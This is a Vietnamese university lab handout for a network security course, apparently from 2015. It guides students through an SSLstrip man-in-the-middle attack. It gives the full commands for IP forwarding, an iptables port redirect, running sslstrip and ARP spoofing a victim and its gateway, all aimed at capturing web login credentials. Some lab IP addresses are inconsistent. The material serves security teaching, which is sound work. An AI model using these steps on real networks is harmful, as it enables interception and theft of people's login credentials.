Upload
others
View
0
Download
0
Embed Size (px)
Citation preview
Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03]
Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ PHẠM TP. HCM 1
SSLSTRIP – MAN IN THE MIDDLE 1 Giới thiệu
SSL Strip là công cụ tương tác ở quá trình chuyển từ http sang https của các ứng
dụng web. SSL Strip là một công cụ hữu hiệu để capture được
username/password login của các ứng dụng web.
SSL Strip được cài sẵn trong máy Kali Linux.
2 Chuẩn bị
Chuẩn bị máy với yêu cầu cụ thể:
1) Máy thật (hoặc ảo) Windows XP/Windows 7 để làm máy nạn nhân (victim)
2) Máy ảo Kali Linux (máy giả mạo) đã cài sẵn dịch vị SSLstripXem thư mục:
Lưu ý: Phải cấu hình máy ảo dạng Bridged (Network Adapter = Bridged) để cùng
mạng.
3 Mô hình Lab
Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03]
Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ PHẠM TP. HCM 2
4 Các bước thực hiện
4.1 Xác định địa chỉ IP các máy
Sử dụng máy ảo window xp làm victim (máy nạn nhân) có ip 10.27.4.38 default gateway:
10.37.4.1, máy tấn công Kali có ip 10.37.4.233
Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03]
Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ PHẠM TP. HCM 3
Có thể xem default gateway của máy Kali bằng lệnh netstat -nr
4.2 IP Forwarding
Trên máy attacker, ta bật (enable) chức năng ipv4 forward để tiến hành arp poisoning:
echo 1 > /proc/sys/net/ipv4/ip_forward
Có thể kiểm tra lại bằng lệnh cat:
4.3 Chuyển hướng gói tin
Dùng iptables để chuyển tất cả gói tin tcp ở port 80 chuyển sang port bất kỳ, ở đây là port
8000. Port này là port listen của sslstrip sau này.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j
REDIRECT --to-port <listenPort>
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j
REDIRECT --to-port 8000
Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03]
Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ PHẠM TP. HCM 4
4.4 Chạy SSLStrip
Chạy sslstrip listen ở port đã chọn ở trên (port 8000):
sslstrip -l <listenPort>
4.5 MitM with ARPSpoof
Tiến hành arpspoof (giả địa chỉ MAC máy victim):
arpspoof -i <interface> -t <targetIP> <gatewayIP>
Với máy victim với ip máy victim là 10.37.4.72 và default gateway là 10.37.4.1, gõ
lệnh:
arpspoof -i eth0 -t 10.37.4.72 10.37.4.1
Ver 1.1 – 2015, FIT, HCMUP Bảo mật và An ninh mạng : LAB 03]
Ths. Lương Trần Hy Hiến, KHOA CNTT – TRƯỜNG ĐH SƯ PHẠM TP. HCM 5
4.6 Thử kết nối web http trên máy victim
4.7 Dừng dịch vụ sslstrip
Ctrl + C
4.8 Xem và phân tích file sslstrip.log
5 Tham khảo
[1] http://bahansen.info/the-attack/execution/attack-vector-1-sslstrip/
[2] https://sites.google.com/site/clickdeathsquad/Home/cds-sslstripping